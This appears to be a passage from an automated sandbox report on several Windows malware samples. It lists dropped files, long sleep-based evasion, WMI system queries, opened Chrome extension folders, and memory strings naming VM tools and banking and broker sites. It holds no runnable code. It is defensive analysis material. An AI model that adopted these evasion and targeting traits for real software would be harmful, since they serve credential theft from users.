Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NvkaspdC.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\uLCuFLgt.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\DhbSKVVV.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bIypVceb.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FjOAgEaQ.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\_socket.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\_bz2.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\FslAQrtN.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qNclTfFu.log	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_5-24273

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes	graph_0-17296
Source: C:\ProgramData\Microsoft\hacn.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\ProgramData\Microsoft\based.exe	Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	API coverage: 5.3 %
Source: C:\ProgramData\Microsoft\based.exe	API coverage: 8.9 %

Source: C:\ProgramData\Microsoft\based.exe TID: 6132	Thread sleep time: -72000s >= -30000s	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe TID: 7136	Thread sleep count: 44 > 30	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe TID: 7136	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -600000s >= -30000s
Source: C:\ProgramData\main.exe TID: 7440	Thread sleep count: 4729 > 30
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -599859s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -599645s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -599484s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -599329s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -599141s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598984s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598827s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598699s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598531s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598312s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -598117s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -597953s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -597672s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -597499s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -597330s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -597141s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596953s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596750s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596547s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596406s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596219s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -596047s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595900s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595730s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595562s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595391s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595219s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -595000s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594836s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594687s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594545s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594437s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594312s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594187s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -594061s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593953s >= -30000s
Source: C:\ProgramData\main.exe TID: 7440	Thread sleep count: 278 > 30
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593811s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593666s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593516s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593312s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593151s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -593036s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592904s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592783s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592609s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592462s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592334s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592203s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -592057s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591930s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591828s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591703s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591580s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591446s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591328s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591187s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -591056s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590950s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590828s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590714s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590594s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590422s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590288s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590169s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -590046s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589891s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589731s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589605s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589437s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589271s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589136s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -589014s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -588899s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -588797s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -588675s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -588484s >= -30000s
Source: C:\ProgramData\main.exe TID: 7496	Thread sleep time: -588352s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8056	Thread sleep count: 2616 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7476	Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388	Thread sleep count: 80 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5244	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8060	Thread sleep count: 2324 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7100	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468	Thread sleep count: 1977 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472	Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3220	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe TID: 7452	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7884	Thread sleep count: 4033 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7884	Thread sleep time: -4033000s >= -30000s
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7884	Thread sleep count: 5963 > 30
Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7884	Thread sleep time: -5963000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7836	Thread sleep count: 1088 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4424	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\cmd.exe TID: 7996	Thread sleep count: 48 > 30
Source: C:\Windows\System32\cmd.exe TID: 7996	Thread sleep time: -48000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8552	Thread sleep time: -12912720851596678s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8540	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Logs\SettingSync\cmd.exe TID: 9036	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Logs\SettingSync\cmd.exe TID: 8792	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\ProgramData\main.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\cmd.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Logs\SettingSync\cmd.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\Logs\SettingSync\cmd.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF72B8D83C0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D9280 FindFirstFileExW,FindClose,	0_2_00007FF72B8D9280
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF72B8F1874
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D9280 FindFirstFileExW,FindClose,	2_2_00007FF72B8D9280
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF72B8D83C0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF72B8F1874
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0042C4A8 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	5_2_0042C4A8
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0043E560 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	5_2_0043E560
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Code function: 5_2_0044D998 FindFirstFileExA,	5_2_0044D998
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447B1FE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	6_2_00007FF6447B1FE4
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF6447A7F4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,	6_2_00007FF6447A7F4C
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 6_2_00007FF644798B00 FindFirstFileExW,FindClose,	6_2_00007FF644798B00
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_0000020694EFDCE0 FindFirstFileExW,	7_2_0000020694EFDCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936983C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	7_2_00007FF6936983C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF693699280 FindFirstFileExW,FindClose,	7_2_00007FF693699280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 7_2_00007FF6936B1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	7_2_00007FF6936B1874
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_000001F16E7ADCE0 FindFirstFileExW,	8_2_000001F16E7ADCE0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF693699280 FindFirstFileExW,FindClose,	8_2_00007FF693699280
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936983C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	8_2_00007FF6936983C0
Source: C:\ProgramData\Microsoft\based.exe	Code function: 8_2_00007FF6936B1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_00007FF6936B1874

Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe

Code function: 5_2_00440B80 VirtualQuery,GetSystemInfo,

5_2_00440B80

Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599859
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599645
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599484
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599329
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599141
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598984
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598827
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598699
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598531
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598117
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597672
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597499
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597330
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597141
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596750
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596547
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596406
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596219
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596047
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595900
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595730
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595562
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595391
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595219
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594836
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594687
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594545
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594437
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594187
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594061
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593811
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593516
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593151
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593036
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592904
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592783
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592609
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592462
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592334
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592203
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592057
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591930
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591828
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591703
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591580
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591446
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591328
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591187
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591056
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590950
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590828
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590714
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590594
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590422
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590288
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590169
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590046
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589891
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589731
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589605
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589437
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589271
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589136
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589014
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588899
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588797
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588675
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588484
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Logs\SettingSync\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Logs\SettingSync\cmd.exe	Thread delayed: delay time: 922337203685477

Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior
Source: C:\ProgramData\Microsoft\based.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior

Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: s.exe, 0000000C.00000003.2070913256.0000000006BB7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: RcF33KCGtqeMuNK3lOt
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmtoolsdS
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vboxservice
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmsrvc
Source: based.exe, 00000008.00000003.2798319156.000001F16CFD8000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2799607063.000001F16CFDA000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2143028640.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2197734724.000001F16CEF1000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000003.2112491572.000001F16CEFB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWj\
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: based.exe, 00000008.00000002.2799828345.000001F16D0E0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: based.exe, 00000008.00000003.2257831090.000001F16E368000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
